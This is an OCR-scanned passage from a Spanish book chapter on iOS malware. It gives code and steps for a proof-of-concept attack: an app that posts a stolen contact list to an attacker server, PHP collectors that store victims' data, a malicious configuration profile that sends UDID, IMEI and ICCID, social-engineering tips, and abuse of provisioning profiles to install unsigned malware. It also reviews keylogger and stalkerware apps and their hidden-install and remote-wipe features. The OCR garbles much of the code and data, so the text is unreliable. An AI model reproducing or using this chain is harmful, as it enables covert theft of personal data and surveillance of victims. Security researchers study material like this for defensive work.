NSString » postString = (pəramString stringByáppendingString:jsonStringl; 

[request setValue: (NSString; stringWithForaat:@"4d", [poststrang lengtnll forHTTPHeaderFietd:@"Content-tength"); 
[request setHITPEody: [postString dataUsingEncoding:NSUTF3StrangEncod ingl); 

11 Creste connection with configured request. 

AASURL Connection «connection [INSURI Connection atloc] Initwithequest: request delegote: self); 


41 Start connection. 
Icomnection startl; 


24 Check åt connection has been crested. 
+1 (connection) { 
NSLeg(8"Connection created suecesstutty!11"); 


Imagen 07.19: Aspecto del método de envio de datos al server malicioso. 


Una vez que la petición está configurada, basta con arrancar la conexión, pasándole dicho request, 
y a funcionar. Evidentemente se pueden implementar muchísimas cosas más, como realizar 
comprobación del correcto establecimiento de la conexión, o incluso recibir comunicaciones del 
servidor, ya que en este caso la comunicación es unidireccional. Pero se podria implementar algo 
mucho más complejo, que permitiese tener cierto control sobre el dispositivo a modo troyano. En 
este caso y teniendo en cuenta que es una prueba de concepto, se ha implementado de la manera 
más sencilla posible, simplemente para demostrar qué se puede hacer para hackear un dispositivo y 
robar algunos datos. 


Server Side 


Por ultimo, falta por ver cómo es el código necesario en el servidor, para que se recojan los 
datos enviados por el dispositivo al que se le ha instalado el malware. En este caso, se ha elegido 
como lenguaje de programación PHP, ya que como servidor se está utilizando MAMP Pro con su 
correspondiente PHPMyAdmin, que es opensource, e ideal para hacer pruebas. 


El lado del servidor se ha implementado, al igual que la app cliente, de la manera más sencilla 
posible, y consiste simplemente en un fichero PHP que recoge lo que el dispositivo infectado envía. 
en cuanto el malware se ejecute. y lo almacena en un fichero de texto. A continuación se muestra 
el código del fichero que recoge los datos, llamado index.php. y que como PoC, proof of concept, 
simplemente recoge y almacena los datos en un fichero: 
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[<?php 
echo “Esta web es para recibir agendas de contactos de ios.. 
es Post] 
Sdatapost = $ POST['paraw"]; 


£f Write file 
file_put_contents("dotopost,txt", Sdatopost); 


El aspecto del fichero generado es el siguiente: 


Y aroi", Y anna-haroGmac.comW”,V"home->555-522-B2334 "1, 
GA [Woanisivi, WHigginsi",1“d-higginsemac.comi",N“home->555-478-76721", 
Wmobdile->(408) 439-5270\",\"home fax->(408) 555-35141"] 444%: [\"Hank\", 
kroffénac.comi", \"work->(555) 766-4823\",\"other->(707) 
ppleseedénac. com”, 

May: [\"Kate\", ABEL", 
Aw, creative-consulting-inc. com\" ,\"mobile->{555) 
564-8583\", \"main->(415) 555-3695\"], \"5\": [\"David\", \"Taylor\", \"home- 
|>555-610-66791"]) A 


Imagen 07.21: Aspecto de los datos recibidos en el servidor malicioso. 


Evidentemente, en caso de querer implementar el malware de manera real, habría que implementar un 
sistema un poco más complejo que, recogiese datos enviados por diferentes dispositivos infectados, 
y los almacenase en lugar de en un fichero. en una base de datos. Además habría que parsear los 
datos JSON recibidos, y clasificarlos para organizarlos en las tablas de la base de datos, y poder 
realizar consultas de manera cómoda. 


Distribución del malware 


Creación y distribución del Perfil de Configuración que roba UDID 


Para la distribución del malware habrá que conocer el UDID de la víctima, para lo cual quizás sca 
necesario un poco de ingeniería social. Ahora se van a indicar varios lugares en donde se puede 
consultar dicha información, siempre y cuando se tenga acceso, El primer lugar en donde se puede 
mirar el UDID es en ¿Tunes, una vez que está conectado el dispositivo. Basta con hacer clic sobre cl 
número de seric y aparece el UDID, tal y como se aprecia en la siguiente captura: 


iPhone de 164 1085.11 
1568] tx) 00% Hay ura nueva versión del scavare del IPhone disponible versión | 


EC 1). Para actualizar sí Phone con el último software, haga clic en 
Acsalizar. 
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Además ¡Tunes hace hackup por defecto de los dispositivos que se conectan, de mancra que crea una 
carpeta por cada dispositivo, en donde aloja dicha copia de seguridad. La carpeta tiene de nombre 
el UDID de cada dispositivo, por lo que a continuación se muestran rutas del backup de ¡Tunes en 
varios sistemas operativos: 
[Windows Vista/7]: C-\Users (usuario) AppDatal Roaming Apple Computer MobileSyne! 

Backup\ 

- [Windows XP]: C:\Documents and Settings\(usernamej\Application Data'Apple 

Computer\MobileSync Backup) 


- [MacOS X]: ~/Library/Application Support/MobileSync/Backup/ 


Por otra parte, los desarrolladores suelen gestionar los dispositivos en los que desarrollan, en 
Organizer, una aplicación dentro del entorno de desarrollo Xcode. Esta opción es interesante ya 
que si el desarrollador tiene los certificados de desarrollo incluidos cn Xcode, cuando se conecta 
un nuevo dispositivo, aparece un botón de Use for Development, con el que con un solo clic el 
dispositivo en cuestión se añadirá a los Provisioning Profiles de desarrollo que haya en dicho Xcode. 
De esta manera si se tiene el dispositivo sin el passcode, en unos segundos se podría capturar el 
UDID con solo parcarlo con Organizer. 


iPhone de ¡64 
Capacity 14,55 08 
Madzi iPhone a 


Serial Number 7 
¿co n 
pem e] 


Soliwase Varsion 5.1-1 (35208) 


Imagen 07.23: Botón Use for Development en Organizer de Xcode. 


Además de itunes y de Xcode, se puede consultar el UDID, asi como otra información acerca de 
los dispositivos en la Utilidad de Configuración de iPhone (iPhone Configuration Utility o iPCU), 
que es un software proporcionado por Apple de manera gratuita para gestionar pequeñas Notas de 
dispositivos (hasta 30 ¡Devices) en colegios, bibliotecas o pequeñas empresas. A continuación se 
muestra una captura de dicha aplicación con los dispositivos asociados que tiene: 


asumen Pertes se conc 


Imagen 07.24: Aspecto de iPCU con los UDID de los dispositivos asociados. 


Capítulo VII. Malware en iOS 


En la parte de abajo de la aplicación, se puede apreciar como aparecen varias pestañas. entre las 
que destaca la de perfiles de datos, que como se ha indicado anteriormente son los que permiten 
instalar apps en los dispositivos, y en este caso se listan todos los que hay instalados en el dispositivo 
conectado, 


Pero todus estas formas de averiguarlo, están muy bien cuando se tiene cerca a la victima, y se le 
puede quitar el dispositivo durante algunos minutos, pero en caso de que no haya acceso físico al 
dispositivo, la cosa se complica, asi que ¿qué opciones quedan? 


Todavía se puede hacer algo más para obtener el UDID sin acceso fisico, y consiste en utilizar 
un Perfil de Configuración (Configuration Profile), de la misma manera que hace la web htip:// 
whatismyudid.com/ en la que el usuario accede a dicha web con un dispositivo 105, descarga e 
instala un perfil de configuración específico, que permite que el dispositivo envíe su UDID a un 
servidor. y se le muestra al usuario en la propia pantalla del dispositivo ¡OS, como se aprecia en la 
captura: 


Funcionamiento de la wob whatsmyudid. 


Pero, ¿Cómo utiliza esta web los perfiles de configuración? La idea es utilizar todo el sistema de 
perfiles que proporciona Apple para implementar la gestión y despliegue a nivel corporativo de 
dispositivos ¡OS. 


A continuación se muestra dicha tabla titulada Command Listing: 
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+ Device Lock 
Control Commands |- Erase Device 


+» Security Information 
» Installed Application List 
+ Device Information 


+ Install Profile 

+ Remove Profile 

+ Install Provisioning Profile 

+ Remove Provisioning Profile 


- Authenticate 
- Token Update 


Imagen 07.26: Tabla Command Listing con las opciones del protocolo MDM. 


Una vez que se han adquirido algunas nociones básicas sobre el tema es muy fácil crear un perfil 
de configuración que solicite cierta información acerca de un dispositivo 10S, como pueden ser el 
identificador único de dispositivo o UDID, las direcciones MAC de Wi-Fi o de Bluetooth, versión 
del software, número de teléfono. modelo y número, número de serie, etcétera. 


Para ver en detalle qué información se puede solicitar a un ¡Device con un perfil, se puede consultar 
una tabla en la que apar todas las posibles peticiones o queries que se pueden realizar sobre el 
dispositivo. A continuación se muestra dicha tabla: 


RequestType Devicelntormation 


Querles gor of strings): 
ilableDeviceCapacity", "BluetoothMAC", 
“Buiidvereion", "CarierSettingsVersion", 
"CurrentCarrierNetwork", "CurrentMCC*, 


"IMEI", "IsRoaming”, "Model", "ModelName”, 
"ModemFirmwaraVersion", "OSVersion", 
"PhoneNumber", "Product", "ProductName", 
“SIMCarrierNetwork", "SIMMCC", "SIMMNC", 
"SerialNumber", "UDID", "WiFIMAC*, "UDID" 


Imagen 07.27: Tabla con toda la información que se puede solicitar a um dispositivo ¿OS con un perfil de configuración. 


Una vez sentadas las bases, se da paso a mostrar el perfil de configuración que se ha creado para que 
cuando sea instalado en un dispositivo ¿OS, este envie el identificador único de dispositivo o UDID 
al servidor que aloja dicho perfil. El UDID como se ha vislo anteriormente es necesario, para crear 
un perfil de datos que permita la instalación del malware de la prueba de concepto, en el dispositivo 
víctima. 
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A continuación se presenta el perfil de configuración, que es un fichero con extensión .mobileconfig 
creado: 


<txm version="1.0" encuding="UTF-8*7> 
<!DOCTYPE plist PUBLIC “-//Apple//DTD PLIST 1.0//EN* "http: //we.apple.com/DTDs/PropertyList-! 
splist version="1 
edict» 
<key>PayloadContent</key> 
«dict> 
<key>URL</keyo 
<stringohtto://192.168,1.6:8888/rotrieve.pnp</string> 
<key>DeviceMttributes</key> 
<array> 
«st ringoUDID</string> 
<string>IMEI</s tring> 
«string»ICCID</String= 
<string>VERSION</st ring» 
«stringsPRODUCT</String> 
</array> 
«dicto 
<key>Pay loadOrganizat ion</key» 
«stringa. informaticas .com</string> 
<key>Pay loadD isplayNamee/key> 
<string>i64 Profile Service</string> 
<key>Pay loadVers ¿on</key> 
«integer>1</integer> 
<key>PaylosdUUID=/key> 
«strino>ignored</string> 
<key>Pay LoadIdentif ier</key> 
«stringshttp: //192. 161 -B088/retrieve-php</string» 
<key>PayloadDescrintione/key> 
<string>This temporary profile will be used to find and display your current device's UDID.«/string> 
<key>PayloadType</key> 
<string>Profile Service</string> 
</dict> 
<p 


Imagen 07,28: Perfil de configuración (profile. mohileconfig) creado para solicitar el UDID a un dispositivo iOS. 


Este perfil ha sido creado manualmente, es decir, con cualquier editor de texto, como por ejemplo 
UltraEdit, NotePad, y un largo etcétera. En este perfil se solicita a un dispositivo ¡OS el UDID, el 
IMEI, el ICCID, la VERSION y el PRODUCT (un ¿Phone 3GS devuelve ¡Phone 2,1), aunque en 
realidad únicamente es necesario conocer el UDID, se solicita más información ya que es posible 
hacerlo y no supone ningún trabajo adicional, y también a modo de ejemplo de posibles datos a 
solicitar a un dispositivo. 


Una vez que se ha creado el perfil que solicita los datos deseados, habria que subirlo a alguna web 
para que las víctimas tuviesen fácil acceso, utilizando alguna técnica de ingeniería social, tal y como 
se ha comentado anteriormente, de manera que cuando la víctima instalase dicho perfil malicioso 
en su dispositivo ¿OS, los datos solicitados por dicho perfil se enviasen al servidor en donde está 
alojado el perfil malicioso, y se persistiesen en él de alguna manera. Para conseguir esta tarea, hay 
que montar algunos ficheros en cl servidor malicioso. 


En la imagen que se muestra a continuación es posible apreciar una captura, en la que aparece la 
arquitectura o los diferentes ficheros que conforman la aplicación web o servidor, que mantendrán 
público el perfil malicioso, y recogerán los datos de las victimas que lo instalen. Están alojados en 
la carpeta htdocs: 
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DS_Store + profile.mobileconfig 
DS Store 

H data.txt 

164_logo.Jog 

È incexphp 

E retrieve php 


[È LEAMENÍ 
$ LIFSMICH.rtf 
Y LISEZ-MOI.rtf 
|i 
a 


a 
7 

Y READMEtÍ 
ES pour 

D ama<rElnt 
E Mamp Control. wdgr 


Tmagen 07.29: Aspecto de la aplicación web que recoge los datos de un dispositivo 20S. 


Ll primer archivo a comentar es el index.php, que es el encargado de presentar el perfil al usuario que 
acceda a la web, que se puede programar según los conocimientos que se posean de PHP, y acorde 
a la lócnica de ingeniería social utilizada para engañar a la víctima. En este caso y como POC se 
presenta algo sencillo, se muestra a continuación: 


Informática 64 


www.informatica64.com 


In order to configura profe service successfully. you must accept the following profa installation: 


Insta 1OS Profle 


Myau can wow this page, your are in  restitod araa, or accesing by VPN cornecion, aná your host was aat up aucccaatuly. Now, In order to install profila, click on the 
pain and acces! instalaton of he corporative IOS prota 


Server nama: Iaea hos 
Dotument-Root /applientions/nanp/ntdnea 


e proti e.n iasentig 


“This page in: English 


Imagen 07.30: Aspecto del index.php del servidor que aloja el perfil malicioso. 


Hay que convencer a la víctima de que haga clic en Install ¿OS Profile e instale dicho perfil malicioso. 
que permitirá al hacker obtener el UDID de la víctima, por lo que la calidad de la web y del engaño 
irán en proporción con el número de victimas. 


Además de alojar los ficheros necesarios para dar aspecto a la web, y hacer creíble el engaño, ya sean 
de imágenes, de estilos, etcétera, y el propio perfil malicioso que se ha creado anteriormente (fichero 
profile.mobileronfig). es necesario un fichero, que contenga el código necesario para recoger y 
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persistir los datos enviados por las víctimas. En este caso es el fichero retrieve.php, el que se encarga 
de dicha tarea. A continuación se muestra el código, que como se puede apreciar es muy simple: 


<?php 


Sdota = file get_contentsC'php://imput'); 


file_put_contents("dato,txt”", $data); 


header( "Location: http://192,168,8.59:8888/i0swalwore/retrieve?data=".rawurlencode($data)); 


Ea] 


es ahí donde tiene sentido el fichero index php de la carpeta 
retrieve, que lo único que hace es un echo por pantalla de lo que le llega por parámetro, y asi mostrar 
los datos que envía el dispositivo, nada más instalar el perfil. 


En un caso de hacking real, bastaría con redireccionar al usuario a una nueva página web en la que 
se le indique que la instalación del certificado ha tenido éxito, o la información pertinente en cada 
caso, según el engaño. 


Para que esta pequeña infraestructura tenga éxito, el perfil debe apuntar a dicha web, y al fichero 
retrieve.php, para que los datos queden correctamente almacenados en el servidor. Si se observa la 
imagen 06.28, en la que aparece el perfil malicioso, se apunta hacia una URL concreta, que en este 
caso apunta al servidor local de pruebas, que es http:/Mocalhost:8888/retrieve.php. 


Instalación del Pertil de Configuración que roba UDID 

Como se ha descrito anteriormente. la idea es subir el perfil malicioso a una web de libre acceso, y 
con un poco de ingeniería social, conseguir que la víctima lo instale, de manera que el dispositivo 
envíe el ansiado UDID al servidor malicioso que el hacker o atacante tiene montado. En el servidor 
se recibiría la información solicitada en el perfil, y se almacenaría en un fichero o en una base de 
datos. A continuación se van a presentar los pasos que realizaría el usuario/víctima para instalar 
dicho perfil. 


Lo primero es cargar la web en la que se encuentra publicado el perfil del atacante que recopilará 
información sobre el dispositivo. es decir, habría que darle la URI. a la víctima y convencerla de 
que acceda e instale el pertil. Una vez que la víctima hace clic en el perfil en el servidor malicioso, 
aparece el perfil en el propio dispositivo. y entonces el usuario debe indicar que desea instalarlo, tal 
y como se muestra en la siguiente captura: 4 
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Instalar perfil 


164 Profile Service 
Informaticaf2 


EE EEES 


This tempor profile wii bo 
moci to find and display your 
turent device's UDI. 
160/2019 


Comprobación para la 
activación del servicio en el 
dispositivo 


firmar 


Cancelar 


Más detalles 


Imagen 07.32: Desplegando perfil en un iPhone. 


Además, el perfil en este caso está sin firmar, lo que complicaría cl engaño, ya que puede hacer 
desconfiar al usuario de que lo instale, aunque esto se puede remediar firmando dicho perfil con un 


certificado válido. 


Una vez que se pulsa el botón /nsralar, lo primero que pide es 


el passcode, y posteriormente se 


muestran los datos que está enviando el propio dispositivo en la pantalla, tal y como se aprecia en 


las siguientes capluras: 


CAI IA) 


182 1000:2RaBAtos" Č 


Codigo Cancelar 
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En este caso y como prueba de concepto, se realiza de la manera más sencilla, por lo que simplemente 
se guarda la respuesta del ¿Phone en un fichero .txt, que tiene el siguiente aspecto: 


tieki 
a +0 Ünü” 
tAsAcó<taml version="1.9" encoding="UTF-B"?> 
A O A 
A 
e 
olas 
a 
A 
A 
E MIE OOE 
ENEN 
a 
rm. 
</plist> 


Apple Inc.1eU 


Apple APhonel0UApple iPhone Device CAD 
1301101036157 
115204 1-6+U$C/27A200-49AF-4253-9510-168493228F501 
uusi 
UCALOU Cupertinotau 


Apple Inc. 10 
v 
APhoncoAo 


DAD, 
AcoAaMaz5:*Yora,rtzzE 
a5”. ""EFOSTO R ApoçIn ttet oj, 5)c:Ú 
ÓRA Arait E 
LL:bior KASE" LOI- [ónt ima lids 00, Éd ta"zÖaqcAioA sousni, 1apÒ5 jy "AGO pOLErOU)*0J79G"=A mb: SLO 
uraou*ta ut”a=+0 
rd 
sünd- 
Avin- AyOwtaskA ptt tNIEAFAe-0tHarquExENEe" dxan _uifogr atar ~ 


ayı 
o uus 


Appte Inc. 16850 
Appie Certification Aurhorityi-ðsu$apple iPhone Certification Authorttyd 


Appie Inc.18 


Apple IPnonstaUAppte iPhone Device CARADR 
nd 


Te huwnrivthgk tas Frog os], 
follar 22" ASAE KBGNRI ZA EN OLÓ? UDAL FG Onagra 


eous. teplijv'MeéspuLecouseidno. “ho kvtawča/1t|508U18/0-t44)Ü "http://w. apple. con/appleca/Sprone.cr10| 


En la captura de este fichero, es posible apreciar como el dispositivo ¡OS, (que en este caso es un 
iPhone 4), ha enviado la información que el perfil solicitaba, y por tanto se podría decir que ha 
finalizado la parte de adquisición o robo del UDID. Con esto el atacante se encuentra en disposición 
de pasar a la siguiente fase del ataque, que sería la creación de un perfil de distribución para que la 
víctima pueda instalar el malware del atacante, ya que sin dicho perfil, no es posible la instalación de 
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software sin firmar en el dispositivo, tal y como se presentó en el apartado Troyanos con Provisioning 
Profiles. 


Creación del perfil de distribución 

Para crear un perfil de distribución, y que las victimas puedan instalar el software, se recuerda que 
el malware no está firmado por Apple, es necesario dirigirse a la web de ¡OS Provisioning Portal, 
que se puede encontrar en la dirección establecida para desarrolladores de Apple, la cual es ¡OS Dev 
Center: 


iOS Developer Program 
105 Provisioning Portal 
ITunes Connect 


Apple Developer Forums. 


Developer Support Center 


Imagen 07.35: Acceso a OS Provisioning Portal, situado en ¡OS De» Center. 


Una vez en el home de ¡OS Provisioning Portal, en la parte de la izquierda hay un panel que contiene 
un menú de opciones, en dicho menú se encuentra la sección de certificados por donde hay que 


comenzar: 
| 


Certificates 


Imagen 07.36: Menú de 10S Provisioning Portal. 


En la sección de certificados se puede encontrar una pestaña How To, en donde hay información 
detallada de cómo crear los certificados. Hay que crear un certificado CSR (Certificate Signing 
Request) con la aplicación Keychain para luego añadirlo o enviarlo a la sección de certificados de 
iOS Provisioning Portal. 


Para crear cl CSR hay que ir al menù principal de la aplicación Keychain, cn Acceso a Llaveros > 
Asistente para certificados > Solicitar un certificado de una autoridad de certificación, y aparecerá 
un cuadro de diálogo como el siguiente: 
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Introduzca información para el certificado que está solicitando. 
Haga dlic en continuar para solicitar un certificado de la CA. 


¡rección de como dei usuario: [iraguzyogintarmadeasa zam e) 


Nombre comán (Já agur ser) 
CENAE VN 2 


La palabra clave: C Se envía por correo electrónico a la CA 


(se guarda en el disco 
p Fermitirme especificar ia información 
*2 cel par de llaves 


Imagen 07,37: Creando im CSR con Keychain para enviarlo a ¿OS Provisioning Portal. 


Esto genera un archivo con extensión .certSigningRequest, que se debe subir al portal. Al cabo 
de poco tiempo, es aceptado, y así el Certificado de Distribución está disponible para descargar y 
ponerlo a buen recaudo en el Keychain. A continuación se muestra en la siguiente captura: 


Name i Explration Daw: | Provisioning Profiles. 
MY juan miguel aguayo Sanchez Jan27, 2014 


Mf you do not have the VAVOR Intermediate certificate Installed, clck hero ro download now. 


Imagen 07.38: Certificado de distribución, disponible para descargarlo. 


uando se descarga, se aprecia que es un fichero .cer, como se puede comprobar en la siguiente 
captura: 


Imagen 07.39: Descargando el certificado de distribución. 
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Después de crear este certificado CSR, enviarlo. que sea aceptado, descargado e instalado, hay que 
crear el Perfil de Distribución, para el cual es necesario el Certificado de Distribución recién creado. 
Hay que situarse en la sección Provisioning > Distribution > New Profile, y aparece todo lo que se 
necesita para completar la creación del perfil, tal y como se muestra en la siguiente captura: 


Create ¡OS Distribution Provisioning Profile 


Generate provisioning profiles here. All felds are required unless otherwise notec. To learn more, visit the How To section. 


Distribution Method O App Store O ad Hoc 
Profile Name [Enter a profile rame A 


Distribution Certificate Juan Miguel Aguayo Sanchez (expiring on Jan 27, 2014) 


App 1D [Sa anaon z 
Devices (optional) Select up to 100 devices for distributing the final application: the final application will run only on 
these selected devices. 


Select All 
[ ChiplronBombitas iPad E Iphone 3G 
Juani iPhone 


Imagen 07.40: Aspecto de la sección para crear un perfil de aprovisionamiento para distribución. 


En esta captura se puede comprobar, que es necesario un nombre para el perfil, seleccionar una 4pp 
ID, y tener añadidos los dispositivos en la lista, además del Certificado de Distribución que se ha 
creado anteriormente y que aparece aulomálicamente. 


Para averiguar el App ID, hay que consultar el fichero /nfo.Plist de la aplicación o malware 
desarrollado, y observar el campo Bundle Identifier, tal y como se aprecia en la siguiente captura: 


Information Property List Dictionary (13 items) 

Localization native development reg String en 
Bundle display name g SIPRODUCT_NAME} 
Executable file g SIEXECUTABLE_NAME} 
Bundle identifier String com.informarica64.SíPRODUCT_NAME-fc1034identifier) 
InfoDictionary version String 60 
Bundle name String SIPRODUCT_NAMEJ 
Bundle OS Type code String APPL 
Bundle versions string, short Siring LO 
Bundle creator OS Type code String m 
Bundle version String Lo 
Application requires ¡Phone envirom Boolean YES 

b Required device capabilities Array (item) 

b Supported Interface orientations Array G items) 


Imagen 07.41: Fichero Info.plist, con el Bundle Identifier. 
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Otra opción es crear un 4pp ID que identifique a toda un conjunto de apps, con lo que una vez que 
se consigue que una víctima se instale el Perfil de Distribución, podría instalar otras aplicaciones o 
malware y no solo el malware de esta PoC. 


Para finalizar, faltaría añadir los dispositivos victimas a la lista de dispositivos del portal, para poder 
erear el perfil para dichos dispositivos en concreto. Es aquí donde entran en juego los UDID robados 
con el perfil de Configuración. Habría que situarse en la sección Device > Manage > Add Devices, 
y aparece una cuadro como el siguiente: 


Device ID (40 hex characters) 


Imagen 07.42: Añadiendo dispositivos al portal de desarrollo de OS. 


En donde se pueden introducir los nombres de dispositivo, y sus respectivos UDID, que se deseen, 
hasta un máximo de 100 con la licencia de desarrollador. 


Con este paso, ya se tiene todo lo necesario para crear el Certificado de Distribución, asi que basta 
con hacer clic en el botón Submit, y el certificado aparecerá como Pending,-tal y como se puede 
apreciar en al siguiente captura: 


Y Distribution Provisioning Profiles 
AT ooo ooa oo 


© E 164 Closed ers 
O 8 ios coca Update 


Imagen 07.43: Certificado en cstado Pending, una vez se ha hecho la solicitud, 


Al poco tiempo, el certificado estará en estado Active, y podrá ser descargado para ser utilizado con 
aquellos dispositivos para los que se creó. como se puede apreciar a continuación: 


$ Distribution Provisioning Profiles 
CT A a Aoo 


O 164 cio tera RING 


O E ros cmical upre 


Imagen 07.44: Certificado en estado Active, listo para descargar y ser utilizado. 


Una vez que se tiene el Certificado de Distribución y el .ipa o fichero resultante tras programar el 
malware deseado, solo falta instalarlo en algún dispositivo, lo que se puede hacer a través de iTunes. 
Esto se aprecia en la siguiente gráfica que representa los pasos a seguir por los testeadores de apps: 
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: Pasos a seguir por los testers de apps en 108. 


Otra opción es utilizar el entorno de desarrollo para realizar la instalación, ya que basta con arrastrar 
el certificado al icono del Xcode, y se podrá realizar la instalación en el dispositivo, como si se 
tratase de un testeo más de desarrollo, una vez esté Xcode levantado y el dispositivo conectado y 
desbloqueado. 


4. Troyanos con Jailbreak 


Como se ha presentado a lo largo de este capítulo, la barrera entre el malware y el usuario final es la 
App Store, pero en caso de que el terminal tenga Jailbreak, se pueden instalar apps de otras fuentes 
o repositorios no oficiales, y por lanto no firmadas por Apple. Por esta razón, es posible encontrar 
muestras de malware en Cydia o en otros repositorios. A continuación se presentan algunas muestras 
de malware y troyanos que se puedan instalar en terminales con Jailbreak: 


¡KeyGuard 

Disponible en Cydia solo para terminales con Jailbreak, hace las funciones de un keylogger clásico, 
ejecutándose discretamente en segundo plano, y capturando cada pulsación en el dispositivo. 
Publicitada como el primer keylogger cn ¿OS y de uso profesional para controlar a los empleados, 
es la herramienta perfecta para capturar información confidencial o interesante de cara a un ataque 
posterior. 


Se accede a través del navegador Safari, con la URL http:/ocalhost:4444/logs, y se puede gestionar 
la aplicación a través de un panel web, tal y como se puede apreciar en la siguiente captura: 


itulo VII. Malware en ¡OS 


lecalost4441095 C 


Logs Settings BUY Logout Loga Setings BUY Logout 

iKeyGuard Settings 

We'come ta the web administration of the 

pacea maa sia pepayonan 

key logger for Devices. Gon Qhoury Ovaiy © 

¡KeyGuard is currently ENABLED EA 

= Osu Or Oso 

© Cian logs after sending e- 

Tio: You can set a pasemord in the settings- mal 


Logs Onone OLog [DEY @ Defaut 
anA 


< 2. ca sm 


Imagen 07.46: Aspecto del panel de control de ¡KeyGuard. 


Se puede configurar el envío de los logs con las pulsaciones capturadas por correo electrónico, 
utilizando varios métodos, y también se puede elegir la frecuencia de envío. La versión gratuita tiene 
muchas limitaciones, pero existen otras dos versiones de pago, con muchas más características muy 
interesantes, como se puede comprobar en la siguiente tabla: 


Y 
Y 
Y 
Y 
Y 
Y 


RARA 


Imagen 07.47: Tabla comparative de las diferentes versions de ¡NeyGuard. 


OwnSpy 

Esta aplicación es un troyano que permite, monitorizar, visualizar y en gencral espiar por completo 
la actividad de un ¿Phone. La lista de funcionalidades es increible. aunque depende de la versión. A 
continuación, se muestran las funcionalidades tal y como aparecen en la web oficial de la app: 
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O WhatsApp 

E Fotos 
Historial Web 
ES Uso de Apps 
M Exportar datos 


N herceptación de 
Nomodos 


Llamado espía 
¡E Correo. 
E Pusociones de tedodo 


Existen varias versiones, disponibles en Cydia, en el repositori 
también se puede encontrar más información en la web ofici 
Evidentemente, para instalarla hace falta que el dispositivo tenga Jailbreak, tal como se explica en 
la web oficial: 


Imagen 07.49: Proceso de instalación de OwnSpy. 


Una vez instalada, basta con registrar el dispositivo, y se podrá controlar desde dicha web. Para 
finalizar, comentar que incluso sería posible ocultar el icono de Cydia, para que el Jailbreak pase 
desapercibido. 


Mobile Spy 

tado en la web oficial hrrp:/Awww MobileSpy.es, como software para espiar dispositivos 
móviles, permite intervenir en secreto desde los mensajes o conversaciones de Whatsapp, chats de 
Facebook, Twitter, localización GPS, llamadas de teléfono, mensajes SMS, fotos y videos, histórico 
de navegación, lista de apps instaladas, e incluso bloquearlas. 


Esta aplicación solo funciona en terminales con Jailbreak, y para instalarla es necesario añadir en 
Cydia el siguiente repositorio NES OM RETA PAUSE Core VAS, que es 
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paquete con otro nombre para no levantar sospechas. Una vez que la app se ha instalado, no 
parece ningún icono en el escritorio, de manera que para poder acceder al panel de control de la 
app, es necesario marcar #12345 en el panel de llamada. Una vez se ha realizado dicha marcación, el 
springboard se reinicia y es entonces cuando aparece el icono de la app, con el nombre Smartphone, 
dy que luce el siguiente aspecto: 


*12345 


2 
5 
8 
0 


a 


Imagen 07.50: Accediendo ul panel de Mobile Spy. 


Jna vez que se ha instalado, y accedido al panel, hay que loguearse o registrarse, ya sea desde el 
opio dispositivo, o accediendo a la parte de registro en la web oficial gensan oies pings. 
minembertregisterphpg y finalmente es posible acceder al panel de cóntrol y configuración en el 
fminal, que se muestra en las siguientes capturas: 


Imagen 07.51: Diferentes secciones de la app Mobile Spy. 
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Para comprobar o gestionar en remoto la información o actividad de un dispositivo iOS, se 


puede acceder vía web, al panel de administración de dicha app, a través de la web NA 
y después de registrarse, se accede al panci trol 


ias partes. 


Tmagen 07.52: Panel de información, dentro del pane! de control remoto de Mobile Spy 


Ln esta primera parte del panel de control. aparece una recopilación de datos del dispositivo 
troyanizado, como tipo de dispositivo, modelo, UDID, IMEI, versión del sistema operativo, 
operador, última TP, cleótera. 


Después de este primer cuadro de información, aparecen otros cuadros que recogen todas las 
acciones que se pueden realizar o monitorizar del dispositivo infectado, séparados en dos secciones, 
tal y como se muestra en la siguiente captura: 


Imagen 07.53: Panel web de control remoto a moniterización de Mobile Spy. 
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:n dicho panel, se encuentran dos secciones, la primera es la parte de logs. llamada Log Viewers y 
segunda sección User Tools. En estas secciones se pueden ver numerosas acciones permitidas, 
para monitorizar diferentes servicios utilizados en el terminal, aunque cabe decir, que no todos 
estos servicios funcionan en ¿OS, ya que algunos son específicos de Blackberry o Android, aunque 
jarecen en este panel, ya que el panel de control es general para todos los sistemas operativos 
móviles, 


Por otra parte se tiene el último cuadro de opciones, llamado User Tools, en el que se pueden 
realizar tareas relacionadas con el propio troyano Mobile Spy y la cuenta con la que se ha registrado 
el dispositivo, ya sea cambiar la contraseña, desinstalar Mobile Spy en remoto, obtener soporte, o 
deslogucarse, y con respecto a los logs. se pueden hacer búsquedas, borrar, o ver el resumen de todos 


logs. 


Además se pueden enviar comandos SMS al dispositivo, lo cual es bastante interesante, ya que a 
través de estos comandos SMS, se pueden realizar multitud de acciones de control sobre el terminal 
infectado. 


A continuación, se muestra una captura de varios ejemplos de comandos SMS: 


¡Phone SMS Commands: 
12345 lock - Remotely lock the phone lo restrict usage. 


*12345 unlock - Remotely unlook the phone to allow usage. 


*12345 gps - Retrieve the current GPS position of the monitored phone. The phone you send 
the command from will receive an SMS message containing this position and a link to it on a 
map. 

*12345 slminto - Retrieve the current information on the SIM card currently in the device. The 
phone you send the command from will receive an SMS message containing this information. 


*12345 wipe - Remotely delete the recent call history, SMS history, URL history, stored contacts, 
and photos on the monitored device. 


When sending an SMS command, only include the command code itsell (no other info in the 
message). The monitored phone will not receive an incoming message alert as if a normal SMS 
does. 


Imagen 07.54; Comandos SMS de Mobile Spy para OS. 


Otra cosa a tener cn cuenta, es la que la funcionalidad del troyano, dependerá de la versión utilizada, 
ya que existe una versión trial, y evidentemente. para tener la funcionalidad total, habrá que tener 
una versión de pago. Además para algunos servicios como el envío de comandos SMS, hace falta 
un complemento llamado LIVE Control Panel, que permite además el envio de los logs por correo. 
Para activar este servicio, hay que situarse en la última pestaña de la app, y se podrá configurar 
frecuencia, y contenidos de logs enviados a la cuenta deseada, tal y como se aprecia en la siguiente 
captura: 


Hacking de dispositivos iOS: ¡Phone de iPad 


MOBIL! 


Live Settings 


Imagen 07.55: Activando LIVE Control Panel. 


A continuación se muestra una captura, en la que aparecen las ventajas del servicio LIVE Control 
Panel, y su precio: 


Sue the Phone's Screen LIVE In Your Browser” 

See the current GPS Location LIVE on a Map 

Parform Instan: Surveillance and Recovery Commands 
Enable Automatic Emall Log Delivery for Normal Logs 
Instanty Send Contacts and Call Logs via Email 
Instantly Send SMS Logs via Email Delivery 

Initiate a Normal Call on the Davice tor Recovery 

Send a Normal SMS on the Devive for Recovery 

Lock or Unlock the Phone From Boing Used 

Turn a Siron Alarm On ar Oft for Recovery 


Purchase Now $39.97 Per Year 


Imagen 07.56: Funcionalidades y precio de LIVE Comro! Panel. 


FlexiSpy y Oxigen Forensic 

